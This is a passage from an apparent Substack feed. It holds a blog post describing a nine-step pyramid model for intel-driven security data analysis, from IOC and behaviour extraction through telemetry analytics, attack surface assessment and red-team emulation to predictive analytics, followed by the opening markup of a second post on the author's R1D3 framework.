data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!euKU!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43476158-8c3c-4abd-9f6f-9691d70a3426_11161x8622.svg 424w, https://substackcdn.com/image/fetch/$s_!euKU!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43476158-8c3c-4abd-9f6f-9691d70a3426_11161x8622.svg 848w, https://substackcdn.com/image/fetch/$s_!euKU!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43476158-8c3c-4abd-9f6f-9691d70a3426_11161x8622.svg 1272w, https://substackcdn.com/image/fetch/$s_!euKU!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43476158-8c3c-4abd-9f6f-9691d70a3426_11161x8622.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!euKU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43476158-8c3c-4abd-9f6f-9691d70a3426_11161x8622.svg" width="11161" height="8622" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/43476158-8c3c-4abd-9f6f-9691d70a3426_11161x8622.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:8622,&quot;width&quot;:11161,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;Threat Hunting Pyramid of Pain&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Threat Hunting Pyramid of Pain" title="Threat Hunting Pyramid of Pain" srcset="https://substackcdn.com/image/fetch/$s_!euKU!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43476158-8c3c-4abd-9f6f-9691d70a3426_11161x8622.svg 424w, https://substackcdn.com/image/fetch/$s_!euKU!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43476158-8c3c-4abd-9f6f-9691d70a3426_11161x8622.svg 848w, https://substackcdn.com/image/fetch/$s_!euKU!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43476158-8c3c-4abd-9f6f-9691d70a3426_11161x8622.svg 1272w, https://substackcdn.com/image/fetch/$s_!euKU!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F43476158-8c3c-4abd-9f6f-9691d70a3426_11161x8622.svg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>I originally wanted to call this a threat hunting pyramid of pain, but then I quickly realised it is a model that can be applied to many security data analysis scenarios, from detection engineering to threat intel and alert triage.</p><p>There is an underlying principle behind any successful security investigation: <em>the need for intelligent, prioritized data analysis.</em></p><p>To successfully drive smart decisions, data and information need to be analysed folks, it doesn't matter what you plan to do with it afterwards. I've written about this extensively in <a href="https://quasarops.com/p/r1d3-threat-driven-defence-p2/">RIDE: Intel Driven Research Pipeline</a>, <a href="https://www.quasarops.com/p/the-problem-of-why-threat-informed-prioritization-in-security-operations">The Problem of Why: Threat-Informed Prioritization</a> and <a href="https://quasarops.com/p/the-threat-hunting-pipeline/">The Threat Hunting Pipeline</a>. So therefore I'm generalizing the "hunt" pyramid to an IDDA (intel-driven data analysis) pyramid.</p><p><em>Whatever dude... show me the goods!</em></p><p>Well, that would be describing the levels of the pyramid.</p><p>But first, remember something: this is just a model. It is not a "how to", I'm not telling you what to do or how you should do it, it's up to you to decide whether the model is useful or not. As they say in statistics</p><div class="pullquote"><p>all models are wrong, some models are useful</p></div><blockquote><p><strong>A note on assumptions:</strong> <em>this pyramid assumes that you start from a near zero point of "minimal knowledge" about the threat and your environment.</em></p></blockquote><h2>Step 1: Contextual Entity and Relationship Extraction</h2><p>As information about threats finds its way to your pipeline of work, the first thing the model asks for is to extract basic situational information to understand its significance. It is about developing a semantic layer that helps orient your analysis.</p><p>For this, an analyst would have to obtain information based on the <a href="https://www.wikiwand.com/en/Five_Ws?ref=quasarops.com">5 Ws</a>: who, what, when, where, and why. This basic data will also help filter out non-significant information.</p><div class="pullquote"><p><em>Hint: journalists have been using this method as far back as 1913 to capture the essence of a "lead" or story.</em></p></div><p><strong>This is the start of your knowledge graph</strong>. This is why I talk about "entity" and "relationship" extraction, these are your nodes and edges, whether you do it formally or informally, you are implicitly building a knowledge graph.</p><h2>Step 2: Structural Entity and Relationship Extraction</h2><p>Once we've gained situational awareness and have applied a first filter on information, we need to inspect it for the low-hanging fruit, what I call <em>atomic indicators</em> and we normally know as IOCs.</p><p>This information might be structured in the form of a STIX schema, but even if it's not, it will be easy for you to recognise it: <em>domains, IPs, urls, fingerprints of all kind (file hashes, PEHash, ImpHash, SSDEEP, JA3, JARM, JA4+, etc.)</em>.</p><p>Atomic indicators are the first layer of actionable information that you can plug into your alert validation, data analysis or threat hunting workstreams.</p><p>I call it Structural ERE (<strong>Entity and Relationship Extraction</strong>) because it is about inherently structured pieces of data that normally follow specific formats and patterns, making them easier to identify and extract than the unstructured information analyzed in the previous step.</p><h2>Step 3: Behaviour Extraction</h2><p>At this stage in the model, we now have situational awareness and we have extracted easily recognizable atomic indicators. What we are missing is the <strong>how</strong>.</p><p>Asking &#8220;how&#8221; is focusing on specifics, it is asking about tradecraft, techniques, procedures and operations.</p><p>Some of the questions you may ask yourself in this stage are:</p><ul><li><p><strong>How does the hypothetical attack or attack chain work?</strong></p></li><li><p><strong>What kind of system evidence would provide information about the attack chain?</strong> Are there any artifacts, logs, or indicators that can be used for further analysis or detection?</p></li><li><p><strong>How was the initial access gained?</strong> Was it through phishing, exploitation of a vulnerability, or some other method?</p></li><li><p><strong>What tools and techniques were used in each stage of the attack?</strong> Were there specific malware families deployed? Any unusual command-and-control mechanisms?</p></li><li><p><strong>What vulnerabilities were exploited?</strong> Are these known vulnerabilities? If not, what is the potential impact?</p></li><li><p><strong>What are the techniques used?</strong> What are the procedures for each sub-technique?</p></li></ul><p>Contrary to atomic indicators, behavioural ones are composite, they normally require a more expressive logic to be described rather than a single datapoint (like an IP). We intend to identify these composite behavioural indicators. Your best friend here will be MITRE ATT&amp;CK.</p><h2>Step 4: Discovery Analytics</h2><p>This is your first data analytics step where you shift your attention not towards hypothetical threat intel but towards your actual telemetry and data lake. Discovery analytics is your first stage of Exploratory Data Analysis (EDA).</p><blockquote><p>Remember, we assume that you don't have a full understanding of your data yet, you have to put in the work to figure out the type, shape, volume and completeness of your telemetry. As you grow more familiar with your data, this step will be less involved</p></blockquote><ul><li><p><strong>What types of data do I have?</strong> Identify the different sources of data you have access to (logs, network traffic, endpoint data, etc.) and the types of fields they contain (timestamps, user IDs, file names, etc.).</p></li><li><p><strong>What is the overall shape of my data?</strong> <strong>How many rows (observations) and columns (features) does my dataset have?</strong> This gives you a basic understanding of the scale and dimensionality of your data. Evaluate how many entries/rows/logs you have during a certain time period, and run deduplication queries.</p></li><li><p><strong>What are the basic statistics of my data?</strong> Calculate summary statistics (mean, median, standard deviation, range, etc.) for numerical variables to get a sense of the central tendencies and spread of your data.</p></li><li><p><strong>Are there any time-based patterns or trends?</strong> Create time series plots to identify any changes or patterns over time.</p></li><li><p><strong>What are the distributions of my data?</strong> Visualize the distributions of your variables (histograms, box plots, density plots) to understand their shape and identify any outliers or unusual patterns.</p></li><li><p><strong>What is the quality of my data?</strong> Assess the completeness, accuracy, and consistency of your data. Identify any missing values, duplicates, or inconsistencies that may need to be addressed.</p></li></ul><h2>Step 5: Atomic Analytics</h2><p>So now you have a better understanding of what types of telemetry are available to you and what fields you can use to achieve analysis objectives. Armed with this knowledge, you can easily run analytic queries that search for the presence of the atomic indicators you extracted in Step 2.</p><p>Any observed matches shouldn't be immediately considered "bad juju", but rather notable datapoints or events that require further investigation.</p><p>The model does not concern itself with what is the level of granularity here, but I assume any defender out there would want to be detailed and granular to ensure you are not missing out logs from remote corners of the network.</p><h2>Step 6: Behavioural and Anomaly Analytics</h2><p>Searching for behavioural patterns in your data is a complex effort. You need to have done a really good in-depth analysis in Steps 2, 3 and 4 to have a solid understanding of attack behaviours, expected system evidence (logs and other artefacts) and available telemetry. We aim to run analytic queries that will help us identify patterns indicative of suspicious behaviour.</p><p>Sometimes data queries won't be enough and you will have to reach out to users, managers and other stakeholders to shed light on observed anomalies.</p><blockquote><p><strong>An anomaly is simply an observation or pattern that significantly deviates from expected behaviour, as such, it can be classified as behavioural analytics.</strong></p></blockquote><p>The kinds of actions and questions I would want to answer in this stage of the pyramid are:</p><ul><li><p><strong>Establish Baselines:</strong> If you haven't already, <em>establish a baseline of normal behaviour for the types of behaviours you are analysing</em>: system processes/handles/dlls, authentication activity, memory allocation, network traffic, etc. This provides a reference point for identifying anomalies.</p></li><li><p><strong>Are there any unexpected or anomalous events?</strong> Look for outliers, spikes, or sudden changes in the data that may indicate unusual activity.</p></li><li><p><strong>Are there any signs of lateral movement or privilege escalation?</strong> Look for events that indicate an attacker moving between systems, gaining access to sensitive data, or attempting to elevate their privileges.</p></li><li><p><strong>Are there any correlations between variables?</strong> Calculate correlation coefficients or create scatter plots to identify any relationships between pairs of variables.</p></li><li><p><strong>Are there any clusters or groupings in my data?</strong> Apply clustering algorithms or visualize the data in lower dimensions (PCA, t-SNE) to identify any natural groupings or segments within your data.</p></li><li><p><strong>How do different variables interact with each other?</strong> Explore interactions between variables through techniques like pivot tables, grouped analysis, or multi-dimensional visualizations.</p></li></ul><h2>Step 7: Operational Environment Assessment</h2><p>Up until now we have focused on extracting meaningful information from threat intelligence and have projected that against the backdrop of our data lake. We interrogated our intel and our telemetry data but did not interrogate control data.</p><p>Without gathering information from our attack surface, existing vulnerabilities and security control deployments, we have an incomplete picture of the potential impact of threats analysed so far.</p><p>When performing discovery work, you may not want to get this far into the pyramid since this stage is not <strong>merely about understanding isolated operational controls</strong>, it is about correlating these with all the pieces of information you have collated so far to form a better picture of how investigated attack vectors and chains can impact your environment.</p><p><strong>We are entering into the territory of threat modelling, attack surface and vulnerability management.</strong></p><p>The kinds of questions I would be looking to answer here are:</p><p><strong>Attack Surface Assessment:</strong></p><ul><li><p><strong>What assets could be potentially impacted?</strong> What are our critical systems, data, and infrastructure? What is their value? Can Crown Jewels potentially be impacted?</p></li><li><p><strong>What vulnerabilities relate to the attack vectors investigated so far?</strong> What are the known weaknesses in our systems, applications, and network? Are there any relevant unpatched vulnerabilities?</p></li><li><p><strong>What is the level of exposure of assets to the Internet?</strong> What is the attack surface for each asset?</p></li><li><p><strong>Which vulnerabilities are most likely to be exploited?</strong> Based on threat intelligence analysed so far and extracted TTPs, which vulnerabilities pose the greatest risk?</p></li></ul><p><strong>Control Effectiveness:</strong></p><ul><li><p><strong>What security controls do we have in place?</strong> You need to <strong>get detailed here</strong>, not just <em>"yeah we have firewalls, IDS, endpoint protection, etc."</em> You need to aim to understand the <strong>specifics</strong>, what particular ports are blocked? what are the specific process/memory controls applied via EDR or AV? what are the system policies applied to different endpoint families? what are the filtering rules of your email proxy? where can you find up-to-date information on cloud policies applied to your tenants? and so on...</p></li><li><p><strong>Are our controls properly configured and up-to-date?</strong> Are they effectively mitigating the risks we've identified?</p></li><li><p><strong>Do our controls provide sufficient visibility?</strong> Can we detect and respond to potential attacks promptly?</p></li></ul><p><strong>Impact Assessment:</strong></p><ul><li><p><strong>How would a successful attack impact our organization?</strong> What would be the financial, operational, and reputational consequences?</p></li><li><p><strong>Which attack vectors pose the greatest risk?</strong> Based on our attack surface and vulnerabilities, which attack paths are most likely to be successful?</p></li><li><p><strong>What is the potential blast radius of an attack?</strong> How far could an attacker move laterally within our network? What other assets could be compromised?</p></li></ul><h2>Step 8: Operational Environment Attack Path Discovery</h2><p>You can see so far how we have navigated from hypothetical scenarios towards the turbulent waters of our real and nuanced operational environments. If you want to truly test your acquired knowledge so far, <em>you need to get more real too</em>.</p><p>This is where the model implements adversarial emulation by engaging pentesters, and red teams or utilizing automated attack simulation tools that systematically test existing controls.</p><p>This includes cloud, on-prem, hybrid, containers, physical and virtual assets, and everything in between.</p><p>The primary goal of this stage is to uncover the most likely and impactful attack paths in your environment.</p><ol><li><p><strong>Infiltrate:</strong> Gain unauthorized access to the target environment, simulating the initial stages of a real-world attack. This could involve exploiting the vulnerabilities you've researched so far, social engineering, or other techniques.</p></li><li><p><strong>Evade:</strong> Bypass existing security controls and remain undetected within the environment for as long as possible. This demonstrates the effectiveness (or lack thereof) of the organization's defense mechanisms.</p></li><li><p><strong>Escalate:</strong> Elevate privileges and gain access to sensitive systems, data, or resources. This assesses the resilience of the environment to lateral movement and privilege escalation attacks.</p></li><li><p><strong>Impact:</strong> Demonstrate the potential impact of a successful attack.</p></li></ol><h2>Step 9: Operational Environment Embedded Predictive Analytics</h2><p>And so fellow cyberscouts, we've climbed the pyramid. From the theoretical heights of threat intelligence to the nitty-gritty trenches of our own systems.</p><p>We've poked, prodded, and stress-tested our defences. Now it's time to crystallize all that nuanced and tailored knowledge into something truly powerful: predictive analytics.</p><p>I'm not talking about crystal balls.</p><p>Though that would be pretty cool.</p><p>I'm talking about weaving together everything we've learned&#8212;threat actor behaviours, our system's quirks, the strengths and weaknesses of our controls&#8212;into a model that can anticipate the next move. We're building an early warning system, one that doesn't just react to attacks, but sniffs them out before they even fully materialize.</p><p>Think of it like a seasoned hunter reading the subtle signs in the forest: a broken twig here, a disturbed patch of leaves there. We're training our systems to do the same, but with the digital breadcrumbs left by those lurking in our networks. It's about turning data into foresight, transforming our deep research into a tactical advantage.</p><p>This is the pinnacle of intel-driven data analysis guys. It's where we stop playing catch-up and start setting the pace.</p><p><em>How do we do that?</em></p><p>Well I'm not an expert data scientist, are you? If you have delved into these mysteries please reach out, perhaps you can write about it in the Tales of a Cyberscout ;)</p><h1>Takeaways</h1><p>It seems we now reached the summit of our pyramid, or should I say the base?</p><p>The tales whispered around the crackling fire have led to these nine takeaways:</p><ol><li><p>&#128066; <strong>Establish Context:</strong> Begin by extracting key information (who, what, when, where, why) from threat intelligence to understand the situation and filter out irrelevant data. This forms the foundation of your analysis.</p></li><li><p>&#127823; <strong>Pluck the low-hanging fruit:</strong> Identify and extract structured atomic indicators (IOCs) like domains, IPs, and hashes, the first layer of actionable information for further investigation.</p></li><li><p>&#128373;&#65039; <strong>Decipher the attacker's playbook:</strong> understand the "how" of an attack by uncovering clear tactics, techniques and procedures, and run a fine-grained pass over the information to reveal hidden patterns. Refocus and expand intel. You will need this to conduct proper data analysis later.</p></li><li><p>&#128506;&#65039; <strong>Know Your Data:</strong> Explore your own telemetry data to understand its structure, volume, and completeness. This step ensures you can effectively leverage your data for analysis.</p></li><li><p>&#128270; <strong>Hunt for atomic traces</strong>: scan your telemetry for the presence of known malicious indicators. Investigate any matches thoroughly.</p></li><li><p>&#127917; <strong>Uncover Anomalies:</strong> Analyze your data for unusual patterns and behaviours that deviate from established baselines. This requires a solid understanding of normal activity and attacker TTPs.</p></li><li><p>&#128376;&#65039; <strong>Map your attack surface:</strong> survey your operational environment and control landscape, identifying weaknesses, gaps and the "as-is" state that pretty diagrams don't show.</p></li><li><p>&#128099; <strong>Emulate Attacks:</strong> Conduct penetration testing or utilize attack simulation tools to identify likely attack paths and test your defences in a real-world scenario.</p></li><li><p>&#128302; <strong>Predict and Prevent:</strong> Integrate all the knowledge gained to develop predictive models capable of anticipating future attacks. This is the ultimate goal of intel-driven data analysis.</p></li></ol><h2>References</h2><p><em>Nothing I said here is truly magnificent and new</em>, I stand on the shoulders of giants and have simply integrated information from research and models that already exist out there. These are some of my references:</p><ul><li><p>David Bianco's recognized <a href="https://www.sans.org/tools/the-pyramid-of-pain/?ref=quasarops.com">Pyramid of Pain</a></p></li><li><p>Red Hat's <a href="https://github.com/redhat-infosec/priority-intelligence-requirements-dev?ref=quasarops.com">Developing Priority Intelligence Requirements v1.1</a></p></li><li><p><a href="https://threat-modeling.com/pasta-threat-modeling/?ref=quasarops.com">PASTA Threat Modelling</a> and <a href="https://versprite.com/blog/what-is-pasta-threat-modeling/?ref=quasarops.com">What is PASTA?</a></p></li><li><p><a href="https://threat-modeling.com/dread-threat-modeling/?ref=quasarops.com">DREAD Threat Modelling</a></p></li><li><p><a href="https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf?ref=quasarops.com">Diamond Model of Intrusion Analysis</a> and <a href="https://threatconnect.com/blog/applying-the-diamond-model-for-threat-intelligence-to-the-star-wars-battle-of-yavin/?ref=quasarops.com">Applying the Diamond Model for Threat Intelligence to the Star Wars Battle of Yavin</a></p></li><li><p><a href="https://handbook.gitlab.com/handbook/security/security-operations/red-team/purple-teaming/?ref=quasarops.com">Purple Teaming at GitLab</a></p></li><li><p><a href="https://github.com/scythe-io/purple-team-exercise-framework?ref=quasarops.com">Purple Team Exercise Framework (PTEF)</a></p></li><li><p><a href="https://www.ten-inc.com/presentations/invincea1.pdf?ref=quasarops.com">Know Your Adversary: An Adversary Model for Mastering Cyber-Defense Strategies</a></p></li><li><p><a href="https://www.threatmodelingmanifesto.org/?ref=quasarops.com">Threat Modeling Manifesto</a></p></li><li><p><a href="https://builtin.com/articles/cybersecurity-threat-informed-defense?ref=quasarops.com">Level Up Your Cybersecurity Operations With Threat-Informed Defense</a></p></li><li><p>Wiki Page for <a href="https://www.wikiwand.com/en/Data_analysis?ref=quasarops.com">Data Analysis</a></p></li><li><p><a href="https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html?ref=quasarops.com">Cyber Kill Chain</a> by Lockheed Martin</p></li><li><p><a href="https://www.unifiedkillchain.com/?ref=quasarops.com">Unified Cyber Kill Chain</a> a university paper created by Paul Pols, the model describes all phases in typical cyber attacks, from the attacker&#8217;s first steps to the achievement of adversarial objectives, bringing together a number of kill chains by various industry contributors.</p></li><li><p><a href="https://attack.mitre.org/?ref=quasarops.com">MITRE ATT&amp;CK</a> (can't leave this one out of course lol)</p></li></ul><div><hr></div><h4>Disclaimer</h4><p><em>The views and opinions expressed in this newsletter are solely my own and do not reflect those of my employer. Information shared here is only meant for general educational purposes and does not constitute real professional advice of any kind.</em></p>]]></content:encoded></item><item><title><![CDATA[🔮R1D3 Threat Driven Research Pipeline - Part 2]]></title><description><![CDATA[This article explores the "Analysis" phase of the R1D3 framework, a threat-driven research pipeline. It covers entity and relationship extraction, linking these to your specific environment, and deciding whether to investigate further. This process transforms raw threat data into actionable information for active defence.]]></description><link>https://www.quasarops.com/p/r1d3-threat-driven-defence-p2</link><guid isPermaLink="false">https://www.quasarops.com/p/r1d3-threat-driven-defence-p2</guid><dc:creator><![CDATA[Diego Perez]]></dc:creator><pubDate>Thu, 25 Apr 2024 06:29:45 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/25005f6c-95a6-422c-ab3b-c14e5e7f6890_1456x832.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!a1HM!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88cf95b1-f254-4177-ab18-b1c98a0c7cfd_1456x832.webp" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!a1HM!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88cf95b1-f254-4177-ab18-b1c98a0c7cfd_1456x832.webp 424w, https://substackcdn.com/image/fetch/$s_!a1HM!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88cf95b1-f254-4177-ab18-b1c98a0c7cfd_1456x832.webp 848w, https://substackcdn.com/image/fetch/$s_!a1HM!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88cf95b1-f254-4177-ab18-b1c98a0c7cfd_1456x832.webp 1272w, https://substackcdn.com/image/fetch/$s_!a1HM!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88cf95b1-f254-4177-ab18-b1c98a0c7cfd_1456x832.webp 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!a1HM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88cf95b1-f254-4177-ab18-b1c98a0c7cfd_1456x832.webp" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/88cf95b1-f254-4177-ab18-b1c98a0c7cfd_1456x832.webp&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;&#128302;R1D3 Threat Driven Research Pipeline - Part 2&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="&#128302;R1D3 Threat Driven Research Pipeline - Part 2" title="&#128302;R1D3 Threat Driven Research Pipeline - Part 2" srcset="https://substackcdn.com/image/fetch/$s_!a1HM!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88cf95b1-f254-4177-ab18-b1c98a0c7cfd_1456x832.webp 424w, https://substackcdn.com/image/fetch/$s_!a1HM!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88cf95b1-f254-4177-ab18-b1c98a0c7cfd_1456x832.webp 848w, https://substackcdn.com/image/fetch/$s_!a1HM!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88cf95b1-f254-4177-ab18-b1c98a0c7cfd_1456x832.webp 1272w, https://substackcdn.com/image/fetch/$s_!a1HM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88cf95b1-f254-4177-ab18-b1c98a0c7cfd_1456x832.webp 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p>Today, let me start with a bit of confession time: my quest to build an "Active Defense" framework has led me down a rabbit hole of epic proportions even the wisest tech oracles wouldn't have predicted &#128007;&#128371;&#65039;&#128302;.</p><p>A simple pondering of questions about the shortsighted views around <a href="https://quasarops.com/p/threat-hunt-vs-detection-engineering-the-saga-continues/">Detection Engineering vs Threat Hunting</a> motivated me to outline something called the <strong>R1D3 Framework</strong> (Research -&gt; Discovery -&gt; Disruption -&gt; Development) which in reality is an evolution of the ideas discussed in <a href="https://quasarops.com/p/the-threat-hunting-shift-part-1/">The Threat Hunting Shift</a> series. Ideas that somehow materialized in <a href="https://aimod2.com/?ref=quasarops.com">AIMOD2</a> but were not yet quite articulated.</p><p><em>&#8220;Where the heck is your Framework man?&#8221;</em> This is a valid question you may ask. To that I would answer: <em>you are witnessing it as it unfolds</em>. You are looking at it with all the chaotic ideas colliding to create new connections, with all the imperfections... &#10024;&#128165;</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!dL0V!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc5b7070a-39e2-43eb-92cd-d755acd1eba7_957x331.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!dL0V!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc5b7070a-39e2-43eb-92cd-d755acd1eba7_957x331.svg 424w, https://substackcdn.com/image/fetch/$s_!dL0V!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc5b7070a-39e2-43eb-92cd-d755acd1eba7_957x331.svg 848w, https://substackcdn.com/image/fetch/$s_!dL0V!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc5b7070a-39e2-43eb-92cd-d755acd1eba7_957x331.svg 1272w, https://substackcdn.com/image/fetch/$s_!dL0V!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc5b7070a-39e2-43eb-92cd-d755acd1eba7_957x331.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!dL0V!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc5b7070a-39e2-43eb-92cd-d755acd1eba7_957x331.svg" width="957" height="331" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c5b7070a-39e2-43eb-92cd-d755acd1eba7_957x331.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:331,&quot;width&quot;:957,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;&#128302;R1D3 Threat Driven Research Pipeline - Part 2&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="&#128302;R1D3 Threat Driven Research Pipeline - Part 2" title="&#128302;R1D3 Threat Driven Research Pipeline - Part 2" srcset="https://substackcdn.com/image/fetch/$s_!dL0V!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc5b7070a-39e2-43eb-92cd-d755acd1eba7_957x331.svg 424w, https://substackcdn.com/image/fetch/$s_!dL0V!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc5b7070a-39e2-43eb-92cd-d755acd1eba7_957x331.svg 848w, https://substackcdn.com/image/fetch/$s_!dL0V!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc5b7070a-39e2-43eb-92cd-d755acd1eba7_957x331.svg 1272w, 